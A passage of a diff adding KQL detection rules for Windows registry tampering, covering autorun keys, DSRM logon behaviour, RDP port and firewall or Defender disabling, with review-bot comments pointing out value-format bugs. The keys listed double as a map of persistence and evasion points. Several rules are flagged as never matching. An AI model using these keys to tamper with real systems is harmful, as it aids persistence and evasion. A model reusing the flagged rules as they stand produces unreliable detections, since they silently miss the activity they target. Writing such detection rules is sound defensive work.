@@ -0,0 +1,12 @@ +// Title: CrashControl CrashDump Disabled +// Author: Tobias Michalski (Nextron Systems) +// Date: 2022-02-24 +// Level: medium +// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112 +// False Positives: +// - Legitimate disabling of crashdumps + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql new file mode 100644 index 00000000..1612837c --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql 
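Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` on the `| where` line is the Sysmon rendering of a DWORD, not what DeviceRegistryEvents stores; if that is the target table, a DWORD value arrives as its decimal text (here `"0"`, with the type in `RegistryValueType`), so this rule never fires. The comparison would need to be `RegistryValueData == "0"` (or `toint(RegistryValueData) == 0`). The same rendering is relied on in the RDP-port hunk, where `not(RegistryValueData =~ "DWORD (0x00000d3d)")` then fails to exclude the default port and the rule fires on every `PortNumber` write, in the DSRM hunk with `"DWORD (0x00000000)"`, and in the CurrentVersion-NT-autorun filters with `"DWORD (0x00000001)"` and friends; the `"(Empty)"`, `"Binary Data"` and `isnull(RegistryValueData)` filters in the autorun hunks are Sysmon conventions as well and should be reviewed together with these.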
@@ -0,0 +1,13 @@ +// Title: CurrentControlSet Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or 
(RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql new file mode 100644 index 00000000..2fe90fd6 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: CurrentVersion Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or 
InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential 
Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith 
"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program 
Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql new file mode 100644 index 00000000..72ecc7e3 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: CurrentVersion NT Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD 
(0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and (not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData 
startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql new file mode 100644 index 00000000..d4771fca --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql @@ -0,0 +1,10 @@ +// Title: Custom File Open Handler Executes PowerShell +// Author: CD_R0M_ +// Date: 2022-06-11 +// Level: high +// Description: Detects the abuse of custom file open handler, executing powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql new file mode 100644 index 00000000..3ff58c13 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql 
@@ -0,0 +1,12 @@
+// Title: Default RDP Port Changed to Non Standard Port
+// Author: frack113
+// Date: 2022-01-01
+// Level: high
+// Description: Detects changes to the default RDP port.
+// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
+// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
new file mode 100644
index 00000000..1f454f54
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
@@ -0,0 +1,10 @@
+// Title: DHCP Callout DLL Installation
+// Author: Dimitrios Slamaris
+// Date: 2017-05-15
+// Level: high
+// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
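Review bot: The exclusion `not(RegistryValueData =~ "DWORD (0x00000d3d)")` in the `| where` line assumes Sysmon's `DWORD (0x...)` rendering of registry data, but DeviceRegistryEvents is a Microsoft Defender for Endpoint table, where REG_DWORD data is reported as a decimal string (3389 for the default port); the exclusion therefore never applies and the rule fires on every PortNumber write, including writes of the default value. The same Sysmon-style literals are used as positive matches in most other registry_set rules in this diff (`=~ "DWORD (0x00000000)"` and similar), where the consequence is the opposite — they would never match. The etw_logging_disabled_in_net_processes_sysmon_registry rule shows the robust shape, accepting both renderings with `in~ ("0", "DWORD (0x00000000)")`; the converter could emit that form for every DWORD comparison, here `not(RegistryValueData in~ ("3389", "DWORD (0x00000d3d)"))`. Worth confirming against live telemetry before relying on any of these rules.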
diff --git a/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
new file mode 100644
index 00000000..e2918b7f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
@@ -0,0 +1,15 @@
+// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering
+// Author: Nischal Khadgi
+// Date: 2024-07-11
+// Level: high
+// Description: Detects changes to "DsrmAdminLogonBehavior" registry value.
+// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
+// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
+// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
+// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
+// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
new file mode 100644
index 00000000..5c10c66e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
@@ -0,0 +1,10 @@
+// Title: Disable Administrative Share Creation at Startup
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
new file mode 100644
index 00000000..ce615daf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable Exploit Guard Network Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Exploit Guard Network Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
new file mode 100644
index 00000000..71d99a50
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
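Review bot: `RegistryValueData =~ "DWORD (00000001)"` in the `| where` line lacks the `0x` prefix that every other DWORD literal in this diff carries (`DWORD (0x00000001)`), so even against Sysmon-formatted data this comparison never matches and the rule is silently dead. The inconsistency probably originates in the upstream Sigma rule's Details value rather than in the converter, but the generated output is still wrong; change it to `RegistryValueData =~ "DWORD (0x00000001)"` or normalise the value format in the conversion pipeline. A CI check that rejects `DWORD (` literals without `0x` would catch this class of typo before it reaches the KQL output.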
@@ -0,0 +1,12 @@
+// Title: Disable Internal Tools or Feature in Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or
RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
new file mode 100644
index 00000000..bb8b3f33
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
@@ -0,0 +1,10 @@
+// Title: Disable Macro Runtime Scan Scope
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-25
+// Level: high
+// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
new file mode 100644
index 00000000..4f2a5274
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: Disable Microsoft Defender Firewall via Registry
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
new file mode 100644
index 00000000..776e4c3e
--- /dev/null
